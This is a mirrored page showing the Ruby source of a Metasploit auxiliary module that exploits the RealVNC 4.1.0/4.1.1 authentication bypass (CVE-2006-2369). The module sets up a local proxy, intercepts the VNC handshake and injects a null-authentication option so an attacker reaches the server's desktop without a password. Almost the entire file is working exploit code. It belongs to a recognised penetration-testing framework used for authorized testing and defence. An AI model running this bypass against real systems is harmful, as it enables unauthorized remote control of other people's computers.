Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'RealVNC NULL Authentication Mode Bypass',

14
        'Description' => %q{

15
          This module exploits an Authentication bypass vulnerability

16
          in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy

17
          listener on LPORT and proxies to the target server.

18


19
          The AUTOVNC option requires that vncviewer be installed on

20
          the attacking machine.

21
        },

22
        'Author' => [

23
          'hdm', # original msf2 module

24
          'theLightCosine'

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          ['BID', '17978'],

29
          ['OSVDB', '25479'],

30
          ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],

31
          ['CVE', '2006-2369'],

32
        ],

33
        'DisclosureDate' => '2006-05-15',

34
        'Notes' => {

35
          'Stability' => [CRASH_SAFE],

36
          'SideEffects' => [IOC_IN_LOGS],

37
          'Reliability' => []

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        OptPort.new('RPORT', [true, 'The port the target VNC Server is listening on', 5900 ]),

45
        OptPort.new('LPORT', [true, 'The port the local VNC Proxy should listen on', 5900 ]),

46
        OptBool.new('AUTOVNC', [true, 'Automatically launch vncviewer from this host', false])

47
      ]

48
    )

49
  end

50


51
  def run

52
    # starts up the Listener Server

53
    print_status('Starting listener...')

54
    listener = Rex::Socket::TcpServer.create(

55
      'LocalHost' => '0.0.0.0',

56
      'LocalPort' => datastore['LPORT'],

57
      'Context' => { 'Msf' => framework, 'MsfExploit' => self }

58
    )

59


60
    # If the autovnc option is set to true this will spawn a vncviewer on the local machine

61
    # targeting the proxy listener.

62
    if datastore['AUTOVNC']

63
      unless check_vncviewer

64
        print_error('The vncviewer does not appear to be installed, exiting...')

65
        return nil

66
      end

67
      print_status('Spawning viewer thread...')

68
      view = framework.threads.spawn('VncViewerWrapper', false) do

69
        system("vncviewer 127.0.0.1::#{datastore['LPORT']}")

70
      end

71
    end

72


73
    # Establishes the connection between the viewier and the remote server

74
    client = listener.accept

75
    add_socket(client)

76


77
    # Closes the listener socket as it is no longer needed

78
    listener.close

79


80
    s = connect

81


82
    serverhello = s.get_once

83
    unless serverhello.include? 'RFB 003.008'

84
      print_error('The server is not vulnerable')

85
      return

86
    end

87


88
    # MitM attack on the VNC Authentication Process

89
    client.puts(serverhello)

90
    clienthello = client.get_once

91
    s.puts(clienthello)

92


93
    s.read(2)

94


95
    print_status('Auth methods received. Sending null authentication option to client')

96
    client.write("\x01\x01")

97
    client.read(1)

98
    s.put("\x01")

99
    s.read(4)

100
    client.put("\x00\x00\x00\x00")

101


102
    # Handles remaining proxy operations between the two sockets

103
    closed = false

104
    while (closed == false)

105
      sockets = []

106
      sockets << client

107
      sockets << s

108
      selected = select(sockets, nil, nil, 0)

109
      # print_status ("Selected: #{selected.inspect}")

110
      next if selected.nil?

111


112
      if selected[0].include?(client)

113
        begin

114
          data = client.get_once

115
          if data.nil?

116
            print_error('Client closed connection')

117
            closed = true

118
          else

119
            s.put(data)

120
          end

121
        rescue StandardError

122
          print_error('Client closed connection')

123
          closed = true

124
        end

125
      end

126


127
      next unless selected[0].include?(s)

128


129
      begin

130
        data = s.get_once

131
        if data.nil?

132
          print_error('Server closed connection')

133
          closed = true

134
        else

135
          client.put(data)

136
        end

137
      rescue StandardError

138
        closed = true

139
      end

140
    end

141


142
    # Close sockets

143
    s.close

144
    client.close

145


146
    if datastore['AUTOVNC']

147
      begin

148
        view.kill

149
      rescue StandardError

150
        nil

151
      end

152
    end

153
  end

154


155
  def check_vncviewer

156
    vnc =

157
      Rex::FileUtils.find_full_path('vncviewer') ||

158
      Rex::FileUtils.find_full_path('vncviewer.exe')

159
    if vnc

160
      return true

161
    else

162
      return false

163
    end

164
  end

165
end

166


167